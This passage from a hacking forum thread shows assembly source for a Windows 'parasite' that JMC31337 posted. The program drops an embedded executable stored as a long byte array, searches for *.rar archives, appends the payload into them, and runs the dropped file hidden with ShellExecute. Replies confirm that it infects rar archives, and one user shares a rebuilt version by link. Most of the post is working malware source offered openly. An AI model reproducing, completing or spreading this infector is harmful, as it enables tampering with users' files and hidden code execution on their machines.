db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,50h,41h,52h,41h,53h,49h,54h,45h,20h,41h,20h,52h,41h,52h,20h,46h,49h
db 4Ch,45h,3Fh,3Fh,00h,2Ah,2Eh,72h,61h,72h,00h,0C4h,3Dh,7Bh,00h,40h,07h,00h,73h,65h,70h,70h,75h,6Bh
db 75h,2Eh,62h,61h,74h,00h,64h,65h,6Ch,20h,73h,65h,70h,70h,75h,6Bh,75h,2Eh,65h,78h,65h,0Dh,0Ah,64h
db 65h,6Ch,20h,73h,65h,70h,70h,75h,6Bh,75h,2Eh,62h,61h,74h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,50h,30h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,0E8h,30h,00h,00h,9Ch,30h,00h,00h,8Ch,30h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,0F5h,30h,00h
db 00h,0D8h,30h,00h,00h,94h,30h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,31h,00h,00h,0E0h,30h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,0Ch,31h,00h
db 00h,1Ah,31h,00h,00h,28h,31h,00h,00h,34h,31h,00h,00h,42h,31h,00h,00h,54h,31h,00h,00h,62h,31h,00h
db 00h,70h,31h,00h,00h,7Eh,31h,00h,00h,96h,31h,00h,00h,0A8h,31h,00h,00h,0B4h,31h,00h,00h,0BEh,31h,00h
db 00h,0CAh,31h,00h,00h,00h,00h,00h,00h,0DAh,31h,00h,00h,00h,00h,00h,00h,0E8h,31h,00h,00h,00h,00h,00h
db 00h,0Ch,31h,00h,00h,1Ah,31h,00h,00h,28h,31h,00h,00h,34h,31h,00h,00h,42h,31h,00h,00h,54h,31h,00h
db 00h,62h,31h,00h,00h,70h,31h,00h,00h,7Eh,31h,00h,00h,96h,31h,00h,00h,0A8h,31h,00h,00h,0B4h,31h,00h
db 00h,0BEh,31h,00h,00h,0CAh,31h,00h,00h,00h,00h,00h,00h,0DAh,31h,00h,00h,00h,00h,00h,00h,0E8h,31h,00h
db 00h,00h,00h,00h,00h,4Bh,45h,52h,4Eh,45h,4Ch,33h,32h,2Eh,64h,6Ch,6Ch,00h,55h,53h,45h,52h,33h,32h
db 2Eh,64h,6Ch,6Ch,00h,53h,48h,45h,4Ch,4Ch,33h,32h,2Eh,44h,4Ch,4Ch,00h,00h,00h,47h,65h,74h,46h,69h
db 6Ch,65h,53h,69h,7Ah,65h,00h,00h,00h,43h,6Ch,6Fh,73h,65h,48h,61h,6Eh,64h,6Ch,65h,00h,00h,00h,43h
db 6Fh,70h,79h,46h,69h,6Ch,65h,41h,00h,00h,00h,45h,78h,69h,74h,50h,72h,6Fh,63h,65h,73h,73h,00h,00h
db 00h,46h,69h,6Eh,64h,46h,69h,72h,73h,74h,46h,69h,6Ch,65h,41h,00h,00h,00h,00h,43h,72h,65h,61h,74h
db 65h,46h,69h,6Ch,65h,41h,00h,00h,00h,44h,65h,6Ch,65h,74h,65h,46h,69h,6Ch,65h,41h,00h,00h,00h,47h
db 6Ch,6Fh,62h,61h,6Ch,41h,6Ch,6Ch,6Fh,63h,00h,00h,00h,53h,65h,74h,43h,75h,72h,72h,65h,6Eh,74h,44h
db 69h,72h,65h,63h,74h,6Fh,72h,79h,41h,00h,00h,00h,00h,53h,65h,74h,46h,69h,6Ch,65h,50h,6Fh,69h,6Eh
db 74h,65h,72h,00h,00h,00h,00h,57h,72h,69h,74h,65h,46h,69h,6Ch,65h,00h,00h,00h,6Ch,73h,74h,72h,63h
db 70h,79h,00h,00h,00h,6Ch,73h,74h,72h,6Ch,65h,6Eh,41h,00h,00h,00h,00h,46h,69h,6Eh,64h,4Eh,65h,78h
db 74h,46h,69h,6Ch,65h,41h,00h,00h,00h,4Dh,65h,73h,73h,61h,67h,65h,42h,6Fh,78h,41h,00h,00h,00h,53h
db 68h,65h,6Ch,6Ch,45h,78h,65h,63h,75h,74h,65h,41h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,10h,00h
db 00h,4Ch,00h,00h,00h,13h,30h,1Dh,30h,29h,30h,35h,30h,3Ch,30h,42h,30h,4Dh,30h,59h,30h,5Eh,30h,75h
db 30h,7Ah,30h,84h,30h,8Ah,30h,98h,30h,9Dh,30h,0B4h,30h,0C8h,30h,0CEh,30h,0D4h,30h,0DAh,30h,0E0h,30h,0E6h
db 30h,0ECh,30h,0F2h,30h,0F8h,30h,0FEh,30h,04h,31h,0Ah,31h,10h,31h,16h,31h,1Ch,31h,22h,31h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,0C4h,3Dh,7Bh,00h,40h,07h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,50h,40h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,0E8h
db 40h,00h,00h,9Ch,40h,00h,00h,8Ch,40h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,0F5h,40h,00h,00h,0D8h
db 40h,00h,00h,94h,40h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,41h,00h,00h,0E0h,40h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,0Ch,41h,00h,00h,1Ah
db 41h,00h,00h,28h,41h,00h,00h,34h,41h,00h,00h,42h,41h,00h,00h,54h,41h,00h,00h,62h,41h,00h,00h,70h
db 41h,00h,00h,7Eh,41h,00h,00h,96h,41h,00h,00h,0A8h,41h,00h,00h,0B4h,41h,00h,00h,0BEh,41h,00h,00h,0CAh
db 41h,00h,00h,00h,00h,00h,00h,0DAh,41h,00h,00h,00h,00h,00h,00h,0E8h,41h,00h,00h,00h,00h,00h,00h,0Ch
db 41h,00h,00h,1Ah,41h,00h,00h,28h,41h,00h,00h,34h,41h,00h,00h,42h,41h,00h,00h,54h,41h,00h,00h,62h
db 41h,00h,00h,70h,41h,00h,00h,7Eh,41h,00h,00h,96h,41h,00h,00h,0A8h,41h,00h,00h,0B4h,41h,00h,00h,0BEh
db 41h,00h,00h,0CAh,41h,00h,00h,00h,00h,00h,00h,0DAh,41h,00h,00h,00h,00h,00h,00h,0E8h,41h,00h,00h,00h
db 00h,00h,00h,4Bh,45h,52h,4Eh,45h,4Ch,33h,32h,2Eh,64h,6Ch,6Ch,00h,55h,53h,45h,52h,33h,32h,2Eh,64h
db 6Ch,6Ch,00h,53h,48h,45h,4Ch,4Ch,33h,32h,2Eh,44h,4Ch,4Ch,00h,00h,00h,47h,65h,74h,46h,69h,6Ch,65h
db 53h,69h,7Ah,65h,00h,00h,00h,43h,6Ch,6Fh,73h,65h,48h,61h,6Eh,64h,6Ch,65h,00h,00h,00h,43h,6Fh,70h
db 79h,46h,69h,6Ch,65h,41h,00h,00h,00h,45h,78h,69h,74h,50h,72h,6Fh,63h,65h,73h,73h,00h,00h,00h,46h
db 69h,6Eh,64h,46h,69h,72h,73h,74h,46h,69h,6Ch,65h,41h,00h,00h,00h,00h,43h,72h,65h,61h,74h,65h,46h
db 69h,6Ch,65h,41h,00h,00h,00h,44h,65h,6Ch,65h,74h,65h,46h,69h,6Ch,65h,41h,00h,00h,00h,47h,6Ch,6Fh
db 62h,61h,6Ch,41h,6Ch,6Ch,6Fh,63h,00h,00h,00h,53h,65h,74h,43h,75h,72h,72h,65h,6Eh,74h,44h,69h,72h
db 65h,63h,74h,6Fh,72h,79h,41h,00h,00h,00h,00h,53h,65h,74h,46h,69h,6Ch,65h,50h,6Fh,69h,6Eh,74h,65h
db 72h,00h,00h,00h,00h,57h,72h,69h,74h,65h,46h,69h,6Ch,65h,00h,00h,00h,6Ch,73h,74h,72h,63h,70h,79h
db 00h,00h,00h,6Ch,73h,74h,72h,6Ch,65h,6Eh,41h,00h,00h,00h,00h,46h,69h,6Eh,64h,4Eh,65h,78h,74h,46h
db 69h,6Ch,65h,41h,00h,00h,00h,4Dh,65h,73h,73h,61h,67h,65h,42h,6Fh,78h,41h,00h,00h,00h,53h,68h,65h
db 6Ch,6Ch,45h,78h,65h,63h,75h,74h,65h,41h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,10h,00h,00h,58h
db 00h,00h,00h,13h,30h,1Dh,30h,29h,30h,35h,30h,3Ch,30h,42h,30h,4Dh,30h,59h,30h,5Eh,30h,75h,30h,7Ah
db 30h,84h,30h,8Ah,30h,98h,30h,9Dh,30h,0BBh,30h,0C5h,30h,0D1h,30h,0DDh,30h,0E7h,30h,0EDh,30h,02h,31h,16h
db 31h,1Ch,31h,22h,31h,28h,31h,2Eh,31h,34h,31h,3Ah,31h,40h,31h,46h,31h,4Ch,31h,52h,31h,58h,31h,5Eh
db 31h,64h,31h,6Ah,31h,70h,31h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,0C4h,3Dh,7Bh,00h,40h,07h,00h
seppuku2len equ $-seppuku2;=======================
.code
start:
;======================
push 0    
push FILE_ATTRIBUTE_NORMAL     ;2 for hidden
push 4        ;or CREATE_ALWAYS   
push 0               
push 0               
push GENERIC_READ + GENERIC_WRITE               
push offset seppuku 
call CreateFileA
mov handl, eax
;=======================
push 0
push NULL
push 0
push handl
call SetFilePointer
;========================
push NULL
push offset byteswritten
push sep_len
push offset seppy
push handl
call WriteFile
push handl
call CloseHandle
;==============================
; mov [count],5  for setting a 5 file infection limit
  push    MB_YESNO
  push    offset caption          
  push    offset logo             
  push    0               
  call    MessageBoxA
cmp eax,6  ;CLICKED YES??
jne end     ; IF NOT JUST END
xor eax,eax
  push offset WFD
  push offset FileMask
  call FindFirstFileA
mov [handl],eax
cmp [handl],-1     ;DIDNT FIND A FILE?
je end   
;============================== 
  push    0
  push    offset caption          
  push    offset WFD.WFD_szseppuku
  push    0               
  call    MessageBoxA
;==========================push 0                    
push FILE_ATTRIBUTE_NORMAL     ;2 for hidden
push 4        ;or CREATE_ALWAYS   
push 0               
push 0               
push GENERIC_READ + GENERIC_WRITE               
push offset WFD.WFD_szseppuku 
call CreateFileA
mov handl2, eax
;============================
push 2
push NULL
push -7
push handl2
call SetFilePointer
;=========================
push NULL
push offset byteswritten2
push seppuku2len
push offset seppuku2
push handl2
call WriteFile;======================
jmp end
;=======MORE THAN 1 FILE SERCH =======
comment ~
@1: 
push offset WFD
push handl
call FindNextFileA
push    0
push    offset caption          push    offset WFD.WFD_szseppukupush    0               
call    MessageBoxA
dec [count]
cmp [count],0
jne @1
~ 
;=======================================
end:push SW_HIDE
push NULL
push NULL
push offset seppuku
push NULL
push NULL
call ShellExecuteAcall ExitProcess
;=====================================
end start
Edited by JMC31337
Link to comment
Share on other sites
  • 1 year later...
cozofdeath

cozofdeath

Posted
Posted

Is seppuku2 complete? What does it actually do? I mean I see it gets run in memory but it is incomplete to view in anything but I know it is an executable.

Link to comment
Share on other sites
  • 5 months later...
JMC31337

JMC31337

Posted
  • Author
Posted (edited)

Attaches itself into a rar archive and

it works

so run it in a folder with a rar archive that's standard compressed

And seppeku2 is an offset to the db of the exe

Edited by JMC31337
Link to comment
Share on other sites
  • 1 month later...
cozofdeath

cozofdeath

Posted
Posted (edited)

OK, last night I was bored and wanted something to get into that isn't too crazy like a packer. This came to mind because I never got into what it really did. Maybe I should of listened to JMC31337's post but I had to check it out myself. So I did and figured I'd post for anyone else that was wondering or just had an open night like myself. Maybe this can be improved on by a curious person or turned into something else. Anyway, I compiled a TASM version and I made a MASM version since that is what I'm used to and TASM is a little older. Here it is with a brief explanation in a readme if need be ...

http://www.mediafire...32cj4jiy3aqt3c6

* This file is not malware and is bundled with the source files. If AVs complain about the MASM version it is because of the virtual file offsets (alignments). Similar to opening the file in Olly and it complains about an empty code section. This can be fixed by realigning the file in CFF or changing them manually. Also, don't expect anything great. This "parasite" just adds a file to an archive, like using "rar a archive.rar somefile.txt".

Edited by cozofdeath
Link to comment
Share on other sites
  • 3 months later...
JMC31337

JMC31337

Posted
  • Author
Posted

Well .... I should have used mapped memory instead of carrying around an entire executive byte code array

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...